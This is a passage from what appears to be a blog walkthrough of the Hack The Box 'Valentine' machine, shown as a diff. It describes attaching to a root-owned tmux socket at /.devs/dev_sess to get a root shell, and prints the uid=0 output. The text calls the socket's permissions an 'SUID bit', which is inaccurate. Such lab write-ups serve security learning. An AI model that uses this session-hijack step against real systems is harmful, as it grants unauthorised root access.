1n4r1/1n4r1.github.io/_posts/2020-04-18-Hackthebox-Valentine-Walkthrough.md

 exit
 ```

+Take a look at `/.devs/dev_sess`.
+We can confirm that this is owned by `root` and SUID bit is set.
 ```shell
 hype@Valentine:/.devs$ ls -l
 total 0
 srw-rw---- 1 root hype 0 Apr 17 12:58 dev_sess
 ```

+Attach the tmux session with this command.<br>
+We can achieve a root shell.
+As always, `root.txt` is in the directory `/root`.
 ```shell
 hype@Valentine:/.devs$ tmux -S /.devs/dev_sess
 ```
 ```shell
 root@Valentine:/.devs# id
 uid=0(root) gid=0(root) groups=0(root)